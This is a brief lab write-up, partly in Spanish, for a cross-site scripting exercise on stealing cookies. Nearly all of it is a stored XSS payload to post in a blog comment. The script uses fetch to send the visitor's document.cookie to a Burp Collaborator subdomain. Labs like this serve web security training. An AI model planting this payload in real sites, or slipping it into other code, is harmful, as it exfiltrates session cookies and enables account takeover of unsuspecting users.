22 Lab: Exploiting cross-site scripting to steal cookies

Enviamos el siguiente payload en un comentario de blog, insertando su subdominio de Burp Collaborator donde se indica:

<script>
fetch('[https://BURP-COLLABORATOR-SUBDOMAIN](https://burp-collaborator-subdomain/)', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
Untitled
Untitled

Last updated